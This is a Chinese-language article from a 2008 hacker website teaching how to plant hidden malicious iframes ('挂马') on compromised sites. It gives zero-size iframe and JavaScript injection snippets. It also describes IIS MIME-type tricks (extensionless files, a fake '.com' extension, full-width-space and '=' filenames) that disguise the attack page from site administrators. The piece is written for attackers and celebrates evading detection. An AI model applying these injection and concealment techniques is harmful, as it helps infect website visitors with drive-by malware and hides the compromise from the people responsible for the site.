奥运倒计时: 设为首页 加入收藏
点击进入太平洋安全网首页
论坛登陆 用户名: 密码:
首页 新闻资讯 文章中心 黑客资源 黑客点睛 安全防护 软件下载 动画教程 商城中心 技术问答 论坛社区
文章 下载 图片
文章   | 电脑知识 | 网络知识 | 菜鸟入门 | 入侵教程 | 黑客攻防 | 黑客编程 | 原创精华 | 黑客人物 | 黑客技术 | 提权技术 | 跨站技术 | 渗透技术 | 鸽子专题 |
 您现在的位置: 太平洋安全网 >> 文章 >> 入侵教程 >> 正文

[组图]在网页里挂上代码的技巧(图)

作者:佚名    文章来源:网上收集    点击数:    更新时间:2008-3-22
话说某夜,月黑风高。一个黑得不能再黑的黑客,在X网站上挂上了自己苦心免杀的Y网马一只。小马刚刚挂上不久就被无情地咔嚓了!我们英明神勇的Z管理员再一次揪出了藏了又藏的小马……

  废话不多说,今天就给大家介绍怎么挂马。也许你会惊讶。挂马,网上不是有流传的方法吗?iframe和Script都能搞得定,怎么还有人来显摆呢?听我说,凡是挂马,最终都是能被发现的(废话!),但是如果能最大限度地躲过检查,那岂不是更妙?因为挂马也是一种艺术。

  下面我就给大家介绍几个挂马的绝招,关键是隐藏。首先我们来了解一下常见的几种网页挂马方式,已经会的就直接跳过吧!

1<iframe src=muma.htm width=0 height=0></iframe>

2

3top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="muma.htm "></iframe>'

  以上是网上常见的挂马方式。挂马,讲的就是隐蔽,不让对方发现;而且就算发现被挂马,也不能轻易地暴露网马的地址。怎么办呢?我们有绝招!

    去文件后缀法

。网马的发现难度是不是一下子增加了不少呢?我们继续改造,调用代码使用<iframe src=width width=0 height=0></iframe>,网马改名为同目录下的width。当然,如果你够“阴险”、够“狡猾”,不怕骂,还可以再考虑其它更迷惑的名字。

  变异文件后缀法

挂马这种方式并不依赖于文件后缀,但是你见过<iframe src=www.baidu.com></iframe>吗?今天我们就来实现它。当然,这要有一定前提的。网马所在的服务器要在你手里,或者你有网站IIS管理权限。我们知道,IIS对受访文件的类型是根据扩展名来识别的,比如我们输入index.asp系统就会调用asp.dll来解析;输入index.htm,就自动解释为HTML代码;如果是exe文件,则直接提示下载。由此触发了我的灵感,何不构造一个自己需要的后缀呢?打开IIS管理器,找到网站,点右键看“属性->HTTP->文件类型”,新建文件扩展名.com,文件类型为text/html,点击确定后,这个扩展名在网站上就可以使用了,而且会被当作HTML来解析,如图1所示。

      

  

 

  接下来,我们进行挂马!在www.shadu120.com网站目录下找到要插入代码的网页index.html,加入代码<iframe src=www.shadu120.com></iframe>。图2大家看懂了吧?就是建一个和网站的名字一样的文件来做网马。刷新http://www.shadu120.com,哇!网马乖乖地出来了,如图3所示。哪个管理员会想到“src=”后面自己网站域名居然会是个网马呢?哈哈!

      

 

  无文件名法

  这是最后的绝招!这里说的无文件名并不是指网马没有文件名,而是我们给网马起一个看不见的文件名。嘿嘿,既然黑,那就黑到底吧!Windows 2000的IIS不需要额外配置,这里就以Windows 2003为例,因为Windows 2003的IIS默认不支持无后缀文件。打开IIS管理器,找到计算机点右键看属性,再选择MIME类型。新建一个扩展名“.*”,类型填写为text/html或application/postscript,确定后IIS 6.0就支持无后缀文件了,具体操作如图4所示。

       

 

   OK,下一步我们在网站目录放一个网马,名字改为“■”(注意:■表示中文全角空格!),然后将代码“<iframe src= > < /iframe>”(注意:等号后面是一个中文全角空格)插入到index.html文件中。

   现在在浏览器里输入http://www.shadu120.com/,哈哈,看到了什么?或者直接输入http://www.shadu120.com/■,也可以马上看到效果!如图5所示。

                     

 

   另外,Windows下的文件名也可以包含“=”,于是上面这段代码自然就产生了“<iframe src= = ></iframe>”的变形,建一个文件名为“=”的文件作为网马,一样能迷惑管理员的眼睛。

修改一下浏览器状态栏的信息,免得调用网马的时候被看到蛛丝马迹。当然,如果你采用的是“无文件名”法,这步可以省略。

  网络安全无极限,更多的东西需要我们去探索和突破。希望大家在新的一年里不断努力,继续发挥想象,在有限的空间里打造属于自己的网络安全

文章录入:放弃    责任编辑:放弃 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
     推荐文章
    固顶文章利用系统漏洞轻轻松松绕过你的验证码
    推荐文章在网页里挂上代码的技巧(图)
    推荐文章推荐:用存储过程一样搞定服务器
    推荐文章完整XSS wrom入侵流程
    推荐文章意外拿下jsp服务器
    推荐文章高手解析如何入侵3389
    推荐文章我是如何黑掉PacketStorm论坛的
    推荐文章看紧你的3306端口,一次通过mysql的检测
     热门文章
    推荐文章推荐:用存储过程一样搞定服务器
    推荐文章浅析浪人文章系统V2.3
    推荐文章扔掉工具,让你飞速学会手工注入
     本站推荐

    关于我们 | 联系方法 | 招聘信息 | 加入会员 | 诚征代理 | 广告服务 | 欢迎投稿 | 站长信箱 | 友情链接 | 网站地图
    24小时客服:0374-7126138 技术支持:0374-7126138 投诉电话:0374-7967536
    客服QQ:883039 售后QQ:827520 技术QQ:78305152 投稿-商业:576880739
    Copyright 太平洋科技 2003-2007 版权所有 All Rights Reserved
      许可证号:豫ICP备07005385号